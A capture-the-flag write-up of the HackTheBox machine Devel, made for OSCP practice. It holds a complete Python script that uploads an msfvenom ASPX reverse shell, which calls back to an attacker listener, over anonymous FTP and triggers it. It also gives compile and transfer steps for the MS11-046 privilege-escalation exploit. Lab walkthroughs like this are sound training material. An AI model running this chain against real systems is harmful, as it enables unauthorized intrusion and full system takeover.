HackTheBox: Devel [OSCP Prep]
- OS: Windows 💠
- Difficulty: Easy 😇
- Release: 15 Mar 2017 📅
- IP: 10.10.10.5 💻
- Box Creator: ch4p 😎
Hello there guys. Welcome to my 6th post on the TJnull OSCP Prep Series. Today we’re going to be discussing Devel from HackTheBox.
Let’s begin with a full Nmap port scan to see what open ports we can find. I’ve used Rustscan because it sweeps all 65535 ports quickly and then hands only the open ones to Nmap for service and script scanning, which is much faster than running `-p-` in Nmap directly:
```
$ rustscan -a 10.10.10.5 -r 1-65535 -- -sV -sC -Pn

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    syn-ack Microsoft IIS httpd 7.5
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 23:05
Completed NSE at 23:05, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 23:05
Completed NSE at 23:05, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 23:05
Completed NSE at 23:05, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.97 seconds
```
I started with FTP because anonymous login is allowed. The files in the FTP root (aspnet_client, iisstart.htm, welcome.png) are not useful in themselves, but they are exactly the files that make up the default IIS 7 welcome page, which is a strong hint about where this FTP root actually lives.
Ok, let’s keep the FTP server aside for a moment and move on to the HTTP server (port 80). A quick dirbust turns up files that exactly match the ones we found on the FTP server. This made me think the FTP root might in fact be the webroot of the IIS server. If that is true, anonymous FTP gives us write access to the webroot, and anything we upload that IIS knows how to execute (an .aspx page here, since the aspnet_client directory tells us ASP.NET is enabled) will run on the server when we request it. Before uploading a payload it is worth confirming the guess with a throwaway text file: upload it over FTP, request it over HTTP, and check that the exact same bytes come back.
- Create a quick reverse shell with msfvenom, in .aspx format so IIS will execute it.
- Upload it to the FTP server (anonymous login, straight into the root).
- Start a listener, then trigger the shell by requesting the uploaded page over HTTP.
- Catch the reverse connection on the listener.
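The whole foothold chain above as a single script, written here as an added example (it is not code from the original write-up). It first proves the FTP root is the webroot with a random canary file, then builds the ASPX payload with msfvenom, uploads it and requests it. The attacker address and port (LHOST/LPORT), the payload type and the listener are assumptions; the target IP comes from the write-up.

```python
#!/usr/bin/env python3
"""Added example (not from the original write-up): drive the Devel foothold chain
from the attacker box. Confirms the anonymous FTP root is the IIS webroot with a
throwaway canary file before dropping a payload, then builds an ASPX reverse
shell with msfvenom, uploads it and requests it over HTTP.
Assumptions: LHOST/LPORT are the attacker's VPN address and listener port, and a
listener (e.g. `nc -lvnp 4444`) is already running there."""
import ftplib
import http.client
import io
import secrets
import subprocess

TARGET = "10.10.10.5"   # from the write-up
LHOST = "10.10.14.2"    # assumption: attacker's tun0 address
LPORT = 4444            # assumption: listener port


def build_msfvenom_cmd(lhost, lport, out="shell.aspx"):
    """msfvenom command line for an unstaged x86 reverse shell rendered as an .aspx page.
    IIS 7.5 with an aspnet_client directory means ASP.NET handlers are mapped, so an
    .aspx file is what the server will actually execute (a .php or .jsp drop would just
    be served as text). The payload choice is an assumption; any IIS-compatible one works."""
    return ["msfvenom", "-p", "windows/shell_reverse_tcp",
            f"LHOST={lhost}", f"LPORT={lport}", "-f", "aspx", "-o", out]


def ftp_anon_upload(host, remote_name, data):
    """Store bytes in the FTP root as the anonymous user (login 'anonymous', any password)."""
    with ftplib.FTP(host, timeout=10) as ftp:
        ftp.login()
        ftp.storbinary(f"STOR {remote_name}", io.BytesIO(data))


def ftp_anon_delete(host, remote_name):
    """Best-effort cleanup of a file we uploaded."""
    with ftplib.FTP(host, timeout=10) as ftp:
        ftp.login()
        try:
            ftp.delete(remote_name)
        except ftplib.error_perm:
            pass


def http_get(host, path, timeout=10):
    """Plain GET returning (status, body)."""
    conn = http.client.HTTPConnection(host, 80, timeout=timeout)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        return resp.status, resp.read()
    finally:
        conn.close()


def canary_name_and_body():
    """Random file name and content so we never collide with, or overwrite, a real file."""
    token = secrets.token_hex(8)
    return f"canary-{token}.txt", token.encode()


def webroot_matches(status, body, expected):
    """FTP root == webroot only if the exact bytes we stored come back with a 200.
    A 200 with different content (e.g. the default IIS7 page) proves nothing."""
    return status == 200 and body.strip() == expected


def confirm_ftp_is_webroot(host):
    name, body = canary_name_and_body()
    ftp_anon_upload(host, name, body)
    try:
        status, fetched = http_get(host, "/" + name)
    finally:
        ftp_anon_delete(host, name)
    return webroot_matches(status, fetched, body)


def main():
    if not confirm_ftp_is_webroot(TARGET):
        raise SystemExit("FTP root is not served by IIS; stop here")
    out = "shell.aspx"
    subprocess.run(build_msfvenom_cmd(LHOST, LPORT, out), check=True)
    with open(out, "rb") as f:
        ftp_anon_upload(TARGET, out, f.read())
    try:
        http_get(TARGET, "/" + out, timeout=5)
    except OSError:
        pass  # the ASPX page blocks while the shell is live; check the listener


if __name__ == "__main__":
    main()
```

Run the listener first, then the script; the trigger request is expected to time out because the page does not return while the shell process is alive, so the OSError from the trigger is swallowed rather than treated as failure.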
The first thing I do in privesc is to check whether the target is vulnerable to some sort of kernel exploit, because on an old unpatched box that’s an easy win. `systeminfo` gives the OS version, build, architecture and installed hotfixes in one go:
```
C:\Windows\TEMP> systeminfo

Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          babis
Registered Organization:
Product ID:                55041-051-0948536-86302
Original Install Date:     17/3/2017, 4:17:31
System Boot Time:          17/10/2021, 7:37:15
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     3.071 MB
Available Physical Memory: 2.453 MB
Virtual Memory: Max Size:  6.141 MB
Virtual Memory: Available: 5.526 MB
Virtual Memory: In Use:    615 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Local Area Connection 3
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.5
                                 [02]: fe80::58c0:f1cf:abc6:bb9e
                                 [03]: dead:beef::1fc
```
From this we can see that:
- OS name => Microsoft Windows 7 Enterprise
- OS version => 6.1.7600, Build 7600 (Windows 7 RTM; SP1 would show build 7601)
- System type => X86-based PC, so the OS is 32-bit even though the CPU line says x64
- Hotfix(s) => N/A, i.e. no updates are reported as installed
Using this information we can search for public privesc exploits. I used Google in this case, but you can also feed the `systeminfo` output to tools like windows-exploit-suggester or Watson, which compare the build and hotfix list against known patches. Whatever you use, note the architecture: the exploit binary has to be 32-bit to run on this OS.
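As an added example (not part of the original write-up), here is a small parser that pulls the privesc-relevant fields out of raw `systeminfo` output and turns them into the three findings used above: build and service-pack level, patch state and OS bitness. The sample input is constructed: a multi-line reconstruction of the fields shown in the write-up’s own dump.

```python
#!/usr/bin/env python3
"""Added example (not from the original write-up): pull the privesc-relevant facts
out of raw `systeminfo` output so the kernel-exploit search starts from the right
build, architecture and patch level instead of eyeballing the dump."""
import re

# Constructed sample: a multi-line reconstruction of the fields shown in the write-up.
SAMPLE_SYSTEMINFO = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
Hotfix(s):                 N/A
Domain:                    HTB
"""

# A field starts at column 0 as "Name: value"; indented "[01]: ..." continuation
# lines belong to the field above and are deliberately not matched.
FIELD_RE = re.compile(r"^([A-Za-z][^:]*?):\s*(.*)$")

WIN7_BUILDS = {
    7600: "Windows 7 RTM (no service pack)",
    7601: "Windows 7 SP1",
}


def parse_systeminfo(text):
    """Map each top-level field name to its value string."""
    info = {}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if m:
            info[m.group(1).strip()] = m.group(2).strip()
    return info


def os_build(info):
    """Build number from 'OS Version: 6.1.7600 N/A Build 7600', or None."""
    m = re.search(r"Build (\d+)", info.get("OS Version", ""))
    return int(m.group(1)) if m else None


def is_x86_os(info):
    """'X86-based PC' is the OS bitness; the CPU line may still say x64 (as here)."""
    return info.get("System Type", "").lower().startswith("x86")


def hotfix_count(info):
    """'N/A' means systeminfo reports no installed updates; 'N Hotfix(s) Installed.' gives N.
    Returns None when the field is missing or unrecognised."""
    value = info.get("Hotfix(s)", "")
    if value.upper() == "N/A":
        return 0
    m = re.match(r"(\d+)\s+Hotfix", value)
    return int(m.group(1)) if m else None


def assess(info):
    """Findings that steer the exploit search (and the compile step that follows)."""
    findings = []
    build = os_build(info)
    if build in WIN7_BUILDS:
        findings.append(f"build {build}: {WIN7_BUILDS[build]}")
    if hotfix_count(info) == 0:
        findings.append("no hotfixes reported: old kernel/driver LPEs are in scope")
    if is_x86_os(info):
        findings.append("32-bit OS: build exploits with i686-w64-mingw32-gcc, not the x86_64 toolchain")
    return findings


if __name__ == "__main__":
    parsed = parse_systeminfo(SAMPLE_SYSTEMINFO)
    for finding in assess(parsed):
        print(finding)
```

On a real engagement, paste the full `systeminfo` output into a file and feed it to `parse_systeminfo`; the same dump is what windows-exploit-suggester consumes, so the checks here are a quick sanity pass before running it.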
The target seems to be vulnerable to MS11-046, the afd.sys (Ancillary Function Driver) local privilege escalation, CVE-2011-1249, which affects unpatched Windows 7 RTM. You can check out the public MS11-046 exploit here. It looks like we have to compile it before transferring it to our target, and since the OS is 32-bit it must be built with the i686 (not x86_64) MinGW toolchain. BTW, the compilation details are provided in the exploit source code, so that’s cool.
```
$ sudo apt-get install mingw-w64
$ i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32
```
Now we can transfer it to our target. The easiest route is the one we already have: upload MS11-046.exe over anonymous FTP, where it lands in the webroot (C:\inetpub\wwwroot by default on IIS) and can be run from our existing shell. Alternatively, host it on a simple HTTP server and pull it down with certutil.exe or PowerShell.
Running it drops us into a new shell; a quick `whoami` should return `nt authority\system`, confirming we now have SYSTEM access on our target.
I hope you have learned something valuable by reading my write-up. If you like this post please share it with your fellow hackermates and if you have any questions & suggestions please feel free to post them down in the comments. I’d love to hear and learn from you.
If you enjoyed this write-up show me some ❤️ by giving me some respect 💯 on HackTheBox, which helps & motivates me to create content like this for the awesome hacking community. Have a great day guys 👋. See you in the next post.